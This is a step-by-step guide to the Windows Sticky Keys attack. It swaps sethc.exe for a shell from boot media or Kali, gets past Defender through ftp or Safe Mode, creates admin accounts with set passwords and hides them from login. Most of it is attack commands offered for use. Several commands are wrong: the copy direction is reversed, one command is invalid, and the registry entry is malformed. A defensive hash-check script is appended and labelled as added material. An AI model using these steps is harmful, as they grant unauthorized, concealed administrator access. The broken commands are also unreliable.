How to Perform a Sticky Keys Attack and Hide Users in Windows

Intro

This guide explains how to use vulnerabilities in Windows to gain access to a system. The attack uses Sticky Keys or interacts directly with system files. Let’s dive in!

Part 1: Using a Windows Boot Disk

1. Change Boot Order to Load Another OS

First, boot your PC with a changed boot order. Go to the "Recovery" screen, click "Troubleshoot" > "Advanced Options" > "Command Prompt" (this is where we get started).

2. List All Disks

wmi get name

3. Access Your Disk and Go to System Folder

D:
cd \windows\system32

4. Replace sethc.exe with cmd.exe or ftp.exe

copy sethc.exe cmd.exe

Note: If Defender blocks you, try using FTP as described below.

5. Reboot the System

shutdown /r /f /t 0

Part 2: Bypassing Defender Restrictions

If Defender is blocking your attack, here are a few ways to bypass it:

1. Use ftp.exe Instead of cmd.exe

You can use the !cmd command to access CMD from ftp.exe.

2. Boot in Safe Mode

Safe Mode is a minimal boot where third-party software like Defender doesn’t run. To boot into Safe Mode:

bcdedit /set {default} safeboot minimal
shutdown /f /r /t 0

To exit Safe Mode:

bcdedit /deletevalue {default} safeboot

Part 3: Adding Users and Escalating Privileges

1. View the User List

net user

2. Add a New User

net user new_username Pa$$w0rd /add

3. Change a User’s Password

net user username Pa$$w0rd

4. Add a User to the Admin Group

net localgroup administrators username /add

5. Hide Users

To hide a user from the login screen, go to the Registry Editor and add this key:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"SpecialAccounts"="hidden_user"

Part 4: Working with Kali Linux

1. Change Boot Order and Load Kali

Insert your Kali USB or CD and change the boot order to load Kali Linux. Open the terminal and mount the Windows disk:

fdisk -l
mount /dev/sda2 /mnt
cd /mnt/Windows/System32

2. Replace sethc.exe with cmd.exe

cp sethc.exe cmd.exe

3. Sync the Changes

sync

4. Unmount the Disk

umount /mnt

Part 5: Defending Against Sticky Keys Attacks

How to Protect Your Computer:
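One check that fits under this heading, written as an added example rather than code from the original guide: it compares sethc.exe against cmd.exe and ftp.exe (the two binaries named above) by SHA-256 and reports a match. The function names and the default path are assumptions; the folder can be a live System32 directory or the same folder on a mounted disk image.

```python
import hashlib
import os

# Names taken from the page: the Sticky Keys binary and the two shells it is swapped with.
TARGET = "sethc.exe"
SHELLS = ("cmd.exe", "ftp.exe")


def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_ci(directory, name):
    """Resolve a file name case-insensitively (NTFS mounted on Linux is case-sensitive)."""
    for entry in os.listdir(directory):
        if entry.lower() == name.lower():
            return os.path.join(directory, entry)
    return None


def check_sethc(system32):
    """Return a list of findings; an empty list means sethc.exe differs from both shells."""
    target = find_ci(system32, TARGET)
    if target is None:
        return [f"{TARGET} is missing from {system32}"]
    target_hash = sha256_of(target)
    findings = []
    for shell in SHELLS:
        shell_path = find_ci(system32, shell)
        if shell_path and sha256_of(shell_path) == target_hash:
            findings.append(f"{TARGET} is byte-identical to {shell}")
    return findings


if __name__ == "__main__":
    import sys
    # Assumed default for a live system; pass the System32 path of a mounted image instead.
    folder = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\System32"
    results = check_sethc(folder) if os.path.isdir(folder) else [f"not a directory: {folder}"]
    print("\n".join(results or ["sethc.exe matches neither shell"]))
```

An empty result only rules out an exact copy of those two shells. Comparing the sethc.exe hash against a known-good value for the installed Windows build covers other replacements.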

Conclusion

In this guide, we covered how to exploit vulnerabilities in Windows to change system files and access the system using Sticky Keys and the Command Prompt. We also walked through adding users, escalating privileges, and hiding users. Lastly, we provided some tips on protecting your system from these kinds of attacks.

If you want to dive deeper into more advanced topics or learn how to defend against these attacks, make sure to check out more of our guides.
